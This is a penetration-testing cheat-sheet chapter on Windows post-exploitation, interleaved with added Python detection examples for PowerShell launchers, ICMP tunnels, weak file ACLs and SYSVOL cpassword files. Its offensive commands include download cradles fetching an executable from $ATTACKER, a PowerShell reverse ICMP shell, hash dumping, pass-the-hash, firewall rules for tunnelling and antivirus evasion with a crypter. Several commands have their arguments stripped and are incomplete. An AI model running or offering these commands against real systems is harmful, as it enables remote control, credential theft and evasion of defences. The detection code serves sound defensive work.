Chapter 4 - Windows Post-Exploitation

_Practice the principle of least privilege. Do not log into a computer with administrator rights unless you must do so to perform specific tasks. Running your computer as an administrator or as a Power User in Windows leaves your computer vulnerable to security risks and exploits. Simply visiting an unfamiliar Internet site with these high-privilege accounts can cause extreme damage to your computer, such as reformatting your hard drive, deleting all your files, and creating a new user account with administrative access._

— Indiana University Best practices for computer security

This is the phase I like to refer to as second-pass enumeration, or enumeration from the inside. Now that we have gained a foothold in the network, it is crucial to run all of our enumeration again from the ground up, this time as an inside actor.

Windows Privilege Escalation Fundamentals - FuzzySecurity

Windows PrivEsc Check - GitHub

Windows Exploit Suggester - GitHub

Encyclopaedia Of Windows Privilege Escalation - YouTube

Level Up! Practical Windows Privilege Escalation - YouTube

Windows Privilege Escalation methods for PenTesters

Windows Attacks At is the new Black - YouTube

Well, that escalated quickly

Analyzing local privilege escalations in win2k

The System Challenge - Decoder's Blog

The Wallstreet of Windows Binaries

Windows Operating System Archaeology

Breaking .NET Through Serialization

Windows Kernel Exploits - GitHub

Cross Compiling from Kali
Kali> i586-mingw32msvc-gcc -o adduser.exe useradd.c
Transpile Python into EXE
Kali> python --onefile
Uploading Files
Kali> cp /usr/share/windows-binaries/nc.exe
Kali> upx -9 nc.exe
Kali> wine exe2bat.exe nc.exe nc.txt
Security Stuff

Exploitation Techniques and Mitigations on Windows

Windows Exploitation

Authentication Registry Keys - MSDN

Demystifying AppContainers in Windows 8 Part 1

Protected Processes in Windows

LSA Authentication - MSDN

Intercepting System Calls on x86_64 Windows

Introduction to Windows Kernel Security

Windows 8 ASLR Internals

Windows Program Automatic Startup Locations

Demystifying the Windows Firewall

Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 … and a new network attack

Bypassing Firewalls with Port 23

Pass the hash is dead long live LocalAccountTokenFilterPolicy

Getting Windows to play with itself: A PenTester's guide to Windows API abuse

Compromise as a Service: our pleAZURE

Powershell Foo

Attacking ADFS Endpoints with PowerShell

PowerShell AD Recon

PowerShell Secrets and Tactics

An Intro to PowerShell and how to use it for Evil

Offensive Active Directory with PowerShell

Low-Level Windows API Access From PowerShell - FuzzySecurity

PowerShell Unicorn

Sherlock for Powershell

Upgrade Shell
C:\> powershell "IEX(New-Object Net.WebClient).downloadString('')"
echo $storageDir = $pwd > wget.ps1
echo $webclient = New-Object System.Net.WebClient >> wget.ps1
echo $url = "http://$ATTACKER/evil.exe" >> wget.ps1
echo $file = "new-exploit.exe" >> wget.ps1
echo $webclient.DownloadFile($url,$file) >> wget.ps1

C:\> powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
Execute ps1
C:\> powershell -exec bypass -windowstyle hidden -nop -file c:\path\to\file.ps1
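The launcher switches used above (a download cradle fed to IEX, -ExecutionPolicy Bypass, -windowstyle hidden, -nop, a script run from a world-writable path) are also what a defender keys on in process-creation telemetry. The following is an added example, not code from the original page: it scores PowerShell command lines against those patterns over a constructed CSV that mimics a simplified Event ID 4688 / Sysmon Event ID 1 export (the column names are this example's own assumption, not any product's schema).

```python
"""Triage of PowerShell process-creation events.

Added example (not from the original page). Command lines are scored
against the launcher patterns shown above. SAMPLE_EVENTS is constructed;
the pid/parent/image/commandline columns are an assumed export shape.
"""
import csv
import io
import re

# Rules are case-insensitive: PowerShell ignores case and attackers vary it.
RULES = [
    ("execution_policy_bypass", re.compile(r"-(?:ep|ex(?:ec|ecutionpolicy)?)\s+bypass", re.I)),
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("download_cradle", re.compile(r"Net\.WebClient.*?\.Download(?:String|File)", re.I)),
    ("iex_invoke", re.compile(r"\b(?:IEX|Invoke-Expression)\b", re.I)),
    ("script_from_writable_dir", re.compile(r"-file\s+\S*\\(?:temp|tmp|users\\public)\\", re.I)),
]

# Constructed sample feed: pid, parent image name, image path, command line.
SAMPLE_EVENTS = r'''pid,parent,image,commandline
4120,explorer.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,powershell.exe
4188,cmd.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,"powershell ""IEX(New-Object Net.WebClient).downloadString('http://192.0.2.10/x.ps1')"""
4201,cmd.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,powershell -exec bypass -windowstyle hidden -nop -file c:\Users\Public\update.ps1
4250,svchost.exe,C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe,powershell.exe -NoProfile -File C:\ProgramData\Scripts\inventory.ps1
4300,cmd.exe,C:\Windows\System32\cmd.exe,cmd /c dir
'''


def score_commandline(cmdline):
    """Return the names of all rules that match a command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def triage(events_csv):
    """Return flagged events as (pid, parent, hits) tuples.

    A PowerShell launch is flagged when it contains a download cradle or
    matches at least two launcher patterns; a lone -NoProfile, common in
    scheduled admin scripts, is not enough on its own.
    """
    flagged = []
    for row in csv.DictReader(io.StringIO(events_csv)):
        if not row["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
            continue
        hits = score_commandline(row["commandline"])
        if "download_cradle" in hits or len(hits) >= 2:
            flagged.append((int(row["pid"]), row["parent"], hits))
    return flagged


if __name__ == "__main__":
    for pid, parent, hits in triage(SAMPLE_EVENTS):
        print(f"pid {pid} (parent {parent}): {', '.join(hits)}")
```

Run as-is it reports pids 4188 and 4201 and stays quiet on the inventory script; in production the same rules belong in your SIEM's query language, with the parent image (cmd.exe under an Office or browser process, for example) added as a further weight.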
Stream contents of file
C:\> Get-Item /path/to/ -Stream *
Get permissions of directory/file
C:\> Get-ACL C:\path\to\file\or\directory
Packet testing
# Setup TCP Listener ie: netcat
C:\> powershell -Command "$client = New-Object System.Net.Sockets.TcpClient;$client.Connect('', 8000);[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes('pie');$client.Client.Send($packet);$client.Close();"

# Setup UDP Listener ie: socat
C:\> powershell -Command "$client = New-Object System.Net.Sockets.UdpClient;$client.Connect('', 8000);[Byte[]] $packet = [Text.Encoding]::ASCII.GetBytes('pie');$client.Send($packet, $packet.Length);$client.Close();"

Kali> sudo python $ATTACKER $TARGET
C:\> powershell -Command "$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $True;$packet = [Text.Encoding]::ASCII.GetBytes('pie');$client.Send('', 500, $packet, $options);"
Reverse ICMP shell
Kali> sudo bash -c "echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all"
Kali> sudo python $ATTACKER $TARGET

C:\> powershell -nop -Command "$IP = '';$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $true;$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes('pie'), $options);while($true){$comms = $client.Send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes(''), $options);if($comms.Buffer){ $cmd = ([Text.Encoding]::ASCII).GetString($comms.Buffer);$reply = (Invoke-Expression -Command $cmd | Out-String);$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes($reply), $options);}}"
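The ICMP shell above carries tasking in echo replies and command output in echo requests, which is exactly what separates it from ping: RFC 792 requires a reply to return the request's data unchanged, ping payloads have fixed default sizes, and ping data never looks like lines of text. The following is an added example, not code from the original page: a packet-level check over constructed echo records (documentation addresses, field names chosen for this example) that flags each of those three deviations.

```python
"""Spot ICMP echo traffic that does not behave like ping.

Added example (not from the original page). SAMPLE_RECORDS is a constructed
list of decoded echo packets; the record keys are this example's own.
"""
from collections import defaultdict

# Assumption: common ping defaults (Windows 32, Linux 56, 64 as a popular explicit size).
STANDARD_ECHO_SIZES = {32, 56, 64}
A, B = "10.0.0.5", "10.0.0.9"          # constructed: a legitimate ping pair
V, K = "10.0.0.23", "198.51.100.7"     # constructed: tunnel endpoint and external peer
WINDOWS_PING_DATA = b"abcdefghijklmnopqrstuvwabcdefghi"   # the 32-byte data ping.exe sends

SAMPLE_RECORDS = [
    # ordinary ping: request data mirrored in the reply
    {"src": A, "dst": B, "type": "request", "ident": 1, "seq": 1, "payload": WINDOWS_PING_DATA},
    {"src": B, "dst": A, "type": "reply",   "ident": 1, "seq": 1, "payload": WINDOWS_PING_DATA},
    {"src": A, "dst": B, "type": "request", "ident": 1, "seq": 2, "payload": WINDOWS_PING_DATA},
    {"src": B, "dst": A, "type": "reply",   "ident": 1, "seq": 2, "payload": WINDOWS_PING_DATA},
    # tunnel: beacon, tasking in the reply, output in the next request, empty reply
    {"src": V, "dst": K, "type": "request", "ident": 7, "seq": 1, "payload": b"pie"},
    {"src": K, "dst": V, "type": "reply",   "ident": 7, "seq": 1, "payload": b"whoami"},
    {"src": V, "dst": K, "type": "request", "ident": 7, "seq": 2, "payload": b"lab\\victim\r\n"},
    {"src": K, "dst": V, "type": "reply",   "ident": 7, "seq": 2, "payload": b""},
]


def looks_like_text(payload):
    """True for non-empty printable ASCII that contains a line ending."""
    return (len(payload) > 0
            and all(32 <= b < 127 or b in (9, 10, 13) for b in payload)
            and (b"\n" in payload or b"\r" in payload))


def analyze_icmp(records):
    """Return {(src, dst): sorted reason list} for directions that look odd."""
    reasons = defaultdict(set)
    pending = {}   # (requester, responder, ident, seq) -> request payload
    for r in records:
        direction = (r["src"], r["dst"])
        if len(r["payload"]) not in STANDARD_ECHO_SIZES:
            reasons[direction].add("nonstandard_size")
        if looks_like_text(r["payload"]):
            reasons[direction].add("text_payload")
        if r["type"] == "request":
            pending[(r["src"], r["dst"], r["ident"], r["seq"])] = r["payload"]
        else:
            key = (r["dst"], r["src"], r["ident"], r["seq"])   # reply travels back
            if key not in pending:
                reasons[direction].add("unsolicited_reply")
            elif pending.pop(key) != r["payload"]:
                reasons[direction].add("reply_payload_mismatch")
    return {d: sorted(v) for d, v in reasons.items()}


if __name__ == "__main__":
    for (src, dst), why in analyze_icmp(SAMPLE_RECORDS).items():
        print(f"{src} -> {dst}: {', '.join(why)}")
```

The mismatch rule is the strong one: a host whose echo replies differ from the request data is not running a normal ICMP stack (on the Kali side above, the kernel's own replies were switched off with icmp_echo_ignore_all for exactly that reason). The size rule needs tuning per environment, since monitoring tools sometimes ping with non-default sizes.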

Windows Privilege Escalation via weak Service Permissions

The Art of Becoming TrustedInstaller

5 Ways to find Systems running domain admin processes

I hunt SysAdmins part 1

I hunt SysAdmins part 2

PenTesting Active Directory Environments: CrapMapExec

Active Directory Privilege Relationships: BloodHound

Active Directory Architecture - MSDN

A Week of Evading Microsoft ATA Day 1

Dumping a domain's worth of passwords with mimikatz part 2

Attack Methods for gaining Domain Admin

Find AD users with empty passwords

Domain Trusts and why you should care

A PenTester's guide to group scoping

How to own any Windows network with group policy hijacking attacks

The Secret Life of Krbtgt

Kerberos Golden Ticket Protection

Kerberos Golden Ticket Final

Et Tu Kerberos

Abusing Microsoft Kerberos

How to pass the ticket through SSH tunnels

From Pass the Hash to Pass the Ticket with no pain

Abusing Token Privileges for LPE

Dump Hashes

Dump windows password hashes efficiently part 1

I'll get your credentials... Later! - FuzzySecurity

Grab the Windows Secrets! - Decoder's Blog

C:\> fgdump.exe
C:\> type
C:\> wce -w

You need to be an admin already: PsExec copies an executable to an admin share, registers it as a service and starts it.

SysInternals PSExec - TechNet

PSExec Pass the Hash

Lateral Movement with Invoke-PsExec

Anatomy of UAC Attacks - FuzzySecurity

Insecure File Permissions

Elevating privileges by exploiting weak folder permissions

C:\> icacls example.exe
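The thing to look for in that icacls output is a broad principal (Everyone, Users, Authenticated Users, Interactive) holding a right that lets it replace the file or rewrite its ACL. The following is an added example, not code from the original page: it parses the text that `icacls <path>` prints, one invocation per path as shown above, and reports such entries. The outputs and paths are constructed.

```python
"""Audit icacls output for write-class access granted to broad principals.

Added example (not from the original page). SAMPLE_OUTPUT maps a path to
constructed `icacls <path>` output; the paths and ACLs are illustrative.
"""
import re

# Principals that effectively mean "any local or domain user".
BROAD_PRINCIPALS = {
    "everyone",
    r"builtin\users",
    r"nt authority\authenticated users",
    r"nt authority\interactive",
}
# icacls abbreviations that allow changing a file, its owner or its DACL:
# F full, M modify, W write, WD write data, AD append data, WDAC write DAC,
# WO write owner, DE delete.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO", "DE"}
INHERITANCE_FLAGS = {"OI", "CI", "IO", "NP", "I"}

# principal:(flag)(flag)(rights) after the path prefix has been removed
ACE = re.compile(r"^(?P<principal>[^:]+):(?P<acl>(?:\([A-Z,]+\))+)$")

SAMPLE_OUTPUT = {
    r"C:\Program Files\ExampleApp\example.exe": r"""C:\Program Files\ExampleApp\example.exe BUILTIN\Users:(I)(F)
                                        NT AUTHORITY\SYSTEM:(I)(F)
                                        BUILTIN\Administrators:(I)(F)

Successfully processed 1 files; Failed processing 0 files
""",
    r"C:\Program Files\ExampleApp": r"""C:\Program Files\ExampleApp NT AUTHORITY\Authenticated Users:(OI)(CI)(M)
                            NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                            BUILTIN\Users:(OI)(CI)(RX)
                            BUILTIN\Users:(DENY)(W)

Successfully processed 1 files; Failed processing 0 files
""",
    r"C:\Tools\viewer.exe": r"""C:\Tools\viewer.exe NT AUTHORITY\SYSTEM:(I)(F)
                    BUILTIN\Administrators:(I)(F)
                    BUILTIN\Users:(I)(RX)

Successfully processed 1 files; Failed processing 0 files
""",
}


def parse_icacls(path, output):
    """Yield (principal, tokens) for each ACE printed by `icacls <path>`."""
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):            # only the first line carries the path
            line = line[len(path):].strip()
        m = ACE.match(line)
        if m:
            yield m.group("principal"), re.findall(r"\(([A-Z,]+)\)", m.group("acl"))


def weak_aces(path, output):
    """Return (path, principal, granted_write_rights) for risky allow ACEs."""
    findings = []
    for principal, tokens in parse_icacls(path, output):
        if principal.lower() not in BROAD_PRINCIPALS or "DENY" in tokens:
            continue
        rights = {r for t in tokens if t not in INHERITANCE_FLAGS for r in t.split(",")}
        granted = sorted(rights & WRITE_RIGHTS)
        if granted:
            findings.append((path, principal, granted))
    return findings


def audit_all(outputs):
    """outputs: {path: icacls output text}. Returns every weak ACE found."""
    findings = []
    for path, output in outputs.items():
        findings.extend(weak_aces(path, output))
    return findings


if __name__ == "__main__":
    for path, principal, granted in audit_all(SAMPLE_OUTPUT):
        print(f"{path}: {principal} has {','.join(granted)}")
```

Feeding it real output means running icacls per path and passing the text in; the example deliberately skips deny ACEs and inheritance flags, and a modify right on a directory that holds a service binary (the second sample) is as serious as full control on the binary itself.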
Insecure SYSVOL
C:\> net use z: \\dc01\SYSVOL
Z:\> dir /s Groups.xml
Z:\> copy
Kali> gpp-decrypt
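The defender's version of the SYSVOL walk above is an audit that reports every Group Policy Preference file still carrying a cpassword attribute, without decrypting anything; the fix is to delete the preference item and rotate the account, and this check is what tells you where. The following is an added example, not code from the original page: it builds a small SYSVOL-like tree in a temporary directory (made-up policy GUIDs, a placeholder cpassword value) and scans it.

```python
"""Find Group Policy Preference files in SYSVOL that still carry cpassword.

Added example (not from the original page). The sample tree is constructed
with placeholder GUIDs and a placeholder cpassword value.
"""
import os
import tempfile
import xml.etree.ElementTree as ET

# GPP XML files that may embed a cpassword attribute.
GPP_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
             "DataSources.xml", "Drives.xml", "Printers.xml"}
# Attributes that name the affected account, depending on the file type.
ACCOUNT_ATTRS = ("userName", "accountName", "runAs")


def find_cpassword(sysvol_root):
    """Return (relative path, element tag, account) for each cpassword found."""
    findings = []
    for dirpath, _dirs, files in os.walk(sysvol_root):
        for name in files:
            if name not in GPP_FILES:
                continue
            full = os.path.join(dirpath, name)
            try:
                root = ET.parse(full).getroot()
            except ET.ParseError:
                continue        # malformed XML deserves its own look; skipped here
            for elem in root.iter():
                if elem.get("cpassword"):
                    account = next((elem.get(a) for a in ACCOUNT_ATTRS if elem.get(a)), "?")
                    findings.append((os.path.relpath(full, sysvol_root), elem.tag, account))
    return findings


WITH_CPASSWORD = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <User name="svc_backup" changed="2017-03-01 10:00:00">
    <Properties action="U" userName="svc_backup" cpassword="PLACEHOLDER-NOT-A-REAL-VALUE" neverExpires="1"/>
  </User>
</Groups>
"""
WITHOUT_CPASSWORD = """<?xml version="1.0" encoding="utf-8"?>
<Groups>
  <Group name="Administrators (built-in)">
    <Properties action="U" groupName="Administrators (built-in)">
      <Members><Member name="CORP\\helpdesk" action="ADD"/></Members>
    </Properties>
  </Group>
</Groups>
"""


def build_sample_sysvol(base):
    """Lay out two constructed policies under a SYSVOL-like tree."""
    policies = {
        "{00000000-0000-0000-0000-000000000001}": WITH_CPASSWORD,
        "{00000000-0000-0000-0000-000000000002}": WITHOUT_CPASSWORD,
    }
    for guid, content in policies.items():
        d = os.path.join(base, "corp.example", "Policies", guid,
                         "Machine", "Preferences", "Groups")
        os.makedirs(d)
        with open(os.path.join(d, "Groups.xml"), "w", encoding="utf-8") as fh:
            fh.write(content)


def demo():
    """Build the constructed tree in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_sysvol(tmp)
        return find_cpassword(tmp)


if __name__ == "__main__":
    for rel, tag, account in demo():
        print(f"{rel}: <{tag}> for account {account} carries cpassword")
```

Against a real domain, point find_cpassword at the mounted SYSVOL share (the Z: mapping above) and schedule it; a clean run after remediation is the evidence that the MS14-025 condition is gone.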

RDP Hijacking: How to hijack RDS and RemoteApp sessions transparently to move through an organization

DLL Injection

Windows DLL Injection Basics

Portable Execution Injection

Automated DLL Enumeration

Automated DLL Injection

Practical guide to NTLM Relaying in 2017 AKA Getting a foothold in under 5 minutes

SMB Relay demystified and NTLMv2 Pwnage with Python

Token Stealing

Once you have admin access on a computer, you can use the tokens of the other users to access resources in the domain.

Passing the Hash
Kali> export SMBHASH="HASH"
Kali> pth-winexe -U administrator //$TARGET cmd

Pass the Hash toolkit

Runas Reference

Encapsulating SSH Traffic with httptunnel
# Bypass Notify with administrative account
$secpasswd = ConvertTo-SecureString "password" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential("Administrator", $secpasswd)
$computer = "DEV01"
powershell -ExecutionPolicy Bypass -File c:\Windows\temp\run.ps1

# add ruleset for firewall
C:\> netsh advfirewall firewall add rule name="httptunnel_client" dir=in action=allow program="httptunnel_client.exe" enable=yes
C:\> netsh advfirewall firewall add rule name="3000" dir=in action=allow protocol=TCP localport=3000
C:\> netsh advfirewall firewall add rule name="1080" dir=in action=allow protocol=TCP localport=1080
C:\> netsh advfirewall firewall add rule name="1079" dir=in action=allow protocol=TCP localport=1079
C:\> httptunnel_client.exe

# upload /usr/share/windows-binaries/plink.exe then setup port forward
C:\> plink -l root -pw pass -R 3389: -P 3000

# Bypass Anti-virus
Kali> cp payload.exe newpayload.exe
Kali> cp /usr/share/windows-binaries/ .
Kali> i586-mingw32msvc-g++ Src/Crypter/*.cpp -o hyperion.exe
Kali> wine hyperion.exe ../newpayload.exe ../crypted.exe